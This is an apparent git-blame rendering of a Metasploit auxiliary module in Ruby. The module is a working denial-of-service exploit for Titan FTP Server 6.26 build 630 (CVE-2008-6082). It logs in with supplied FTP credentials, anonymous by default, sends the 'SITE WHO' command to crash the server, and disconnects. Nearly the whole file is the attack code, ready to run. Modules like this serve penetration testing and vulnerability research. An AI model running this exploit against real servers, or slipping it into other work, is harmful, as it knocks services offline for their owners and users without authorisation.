2009-01-09 05:33:26 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2009-01-09 05:33:26 +00:00
|
|
|
##
|
|
|
|
|
2008-10-15 04:23:05 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::Ftp
|
|
|
|
include Msf::Auxiliary::Dos
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Titan FTP Server 6.26.630 SITE WHO DoS',
|
|
|
|
'Description' => %q{
|
|
|
|
The Titan FTP server v6.26 build 630 can be DoS'd by
|
|
|
|
issuing "SITE WHO". You need a valid login so you
|
|
|
|
can send this command.
|
|
|
|
},
|
|
|
|
'Author' => 'kris katterjohn',
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2008-6082'],
|
|
|
|
[ 'OSVDB', '49177'],
|
|
|
|
[ 'EDB', '6753']
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Oct 14 2008'))
|
2008-10-15 04:23:05 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# They're required
|
|
|
|
register_options([
|
|
|
|
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
|
|
|
|
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
|
|
|
|
])
|
|
|
|
end
|
2008-10-15 04:23:05 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run
|
|
|
|
return unless connect_login
|
|
|
|
print_status("Sending command...")
|
|
|
|
raw_send("SITE WHO\r\n")
|
|
|
|
select(nil,nil,nil,1)
|
|
|
|
disconnect
|
|
|
|
end
|
2008-10-30 00:52:38 +00:00
|
|
|
end
|